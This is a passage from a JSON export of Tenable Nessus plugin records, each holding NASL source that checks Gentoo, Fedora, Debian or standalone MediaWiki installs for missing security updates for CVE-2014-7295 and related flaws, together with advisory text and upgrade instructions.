"CVE-2014-9481", "CVE-2014-2243", "CVE-2014-9475", "CVE-2014-9507", "CVE-2013-6452", "CVE-2014-9478", "CVE-2014-2665", "CVE-2014-9276", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295", "CVE-2014-9480"], "modified": "2015-02-09T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:mediawiki"], "id": "GENTOO_GLSA-201502-04.NASL", "href": "https://www.tenable.com/plugins/nessus/81227", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201502-04.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81227);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\", \"CVE-2014-2665\", \"CVE-2014-2853\", \"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-7199\", \"CVE-2014-7295\", \"CVE-2014-9276\", \"CVE-2014-9277\", \"CVE-2014-9475\", \"CVE-2014-9476\", \"CVE-2014-9477\", \"CVE-2014-9478\", \"CVE-2014-9479\", \"CVE-2014-9480\", \"CVE-2014-9481\", \"CVE-2014-9487\", \"CVE-2014-9507\");\n script_xref(name:\"GLSA\", value:\"201502-04\");\n\n script_name(english:\"GLSA-201502-04 : MediaWiki: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201502-04\n(MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. 
Please\n review the CVE identifiers and MediaWiki announcement referenced below\n for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, create a Denial of Service condition, obtain\n sensitive information, bypass security restrictions, and inject arbitrary\n web script or HTML.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-June/000155.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ef35312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201502-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MediaWiki 1.23 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.23.8'\n All MediaWiki 1.22 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.22.15'\n All MediaWiki 1.19 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.19.23'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/mediawiki\", unaffected:make_list(\"ge 1.23.8\", \"rge 1.22.15\", \"rge 1.19.23\"), vulnerable:make_list(\"lt 1.23.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MediaWiki\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:06", "description": 
"*CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove separation of\ncss and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-10-09T00:00:00", "title": "Fedora 21 : mediawiki-1.23.5-1.fc21 (2014-12155)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-09T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-12155.NASL", "href": "https://www.tenable.com/plugins/nessus/78103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12155.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78103);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n script_xref(name:\"FEDORA\", value:\"2014-12155\");\n\n script_name(english:\"Fedora 21 : mediawiki-1.23.5-1.fc21 (2014-12155)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"*CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove separation of\ncss and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148675\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140214.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c135957\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"mediawiki-1.23.5-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:12:06", "description": " - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-10-14T00:00:00", "title": "Fedora 20 : mediawiki-1.23.5-1.fc20 (2014-12263)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-14T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-12263.NASL", "href": "https://www.tenable.com/plugins/nessus/78402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12263.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78402);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n script_xref(name:\"FEDORA\", value:\"2014-12263\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.23.5-1.fc20 (2014-12263)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148675\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140740.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0608efb0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.23.5-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T10:12:06", "description": " - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-10-14T00:00:00", "title": "Fedora 19 : mediawiki-1.23.5-1.fc19 (2014-12262)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-14T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:mediawiki"], "id": "FEDORA_2014-12262.NASL", "href": "https://www.tenable.com/plugins/nessus/78401", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12262.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78401);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n script_xref(name:\"FEDORA\", value:\"2014-12262\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.23.5-1.fc19 (2014-12262)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2014-7295 (bug 70672) SECURITY: OutputPage: Remove\n separation of css and js module allowance.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148675\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140819.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?264cc2ab\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.23.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T09:48:46", "description": "It was reported that MediaWiki, a website engine for collaborative\nwork, allowed to load user-created CSS on pages where user-created\nJavaScript is not allowed. A wiki user could be tricked into\nperforming actions by manipulating the interface from CSS, or\nJavaScript code being executed from CSS, on security-wise sensitive\npages like Special:Preferences and Special:UserLogin. 
This update\nremoves the separation of CSS and JavaScript module allowance.", "edition": 14, "published": "2014-10-06T00:00:00", "title": "Debian DSA-3046-1 : mediawiki - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:mediawiki"], "id": "DEBIAN_DSA-3046.NASL", "href": "https://www.tenable.com/plugins/nessus/78047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3046. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78047);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_xref(name:\"DSA\", value:\"3046\");\n\n script_name(english:\"Debian DSA-3046-1 : mediawiki - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was reported that MediaWiki, a website engine for collaborative\nwork, allowed to load user-created CSS on pages where user-created\nJavaScript is not allowed. A wiki user could be tricked into\nperforming actions by manipulating the interface from CSS, or\nJavaScript code being executed from CSS, on security-wise sensitive\npages like Special:Preferences and Special:UserLogin. 
This update\nremoves the separation of CSS and JavaScript module allowance.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mediawiki\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3046\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mediawiki packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.19.20+dfsg-0+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.20+dfsg-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:07:05", "description": "According to its version number, the MediaWiki application running on\nthe remote host is affected by an input validation error in the\n'includes/OutputPage.php' script related to JavaScript in CSS content.\nThis can be exploited to conduct cross-site scripting (XSS) attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 27, "published": "2014-10-09T00:00:00", "title": "MediaWiki < 1.19.20 / 1.22.12 / 1.23.5 'includes/OutputPage.php' XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7295"], "modified": "2014-10-09T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_23_5.NASL", "href": "https://www.tenable.com/plugins/nessus/78109", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78109);\n script_version(\"1.7\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7295\");\n script_bugtraq_id(70238);\n\n script_name(english:\"MediaWiki < 1.19.20 / 1.22.12 / 1.23.5 'includes/OutputPage.php' XSS\");\n script_summary(english:\"Checks the MediaWiki version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MediaWiki application running on\nthe remote host is affected by an input validation error in the\n'includes/OutputPage.php' script related to JavaScript in CSS content.\nThis can be exploited to conduct cross-site scripting (XSS) attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-October/000163.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30a52eab\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.20\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.12\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.23#MediaWiki_1.23.5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T72672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2014/q4/67\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.20 / 1.22.12 / 1.23.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7295\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
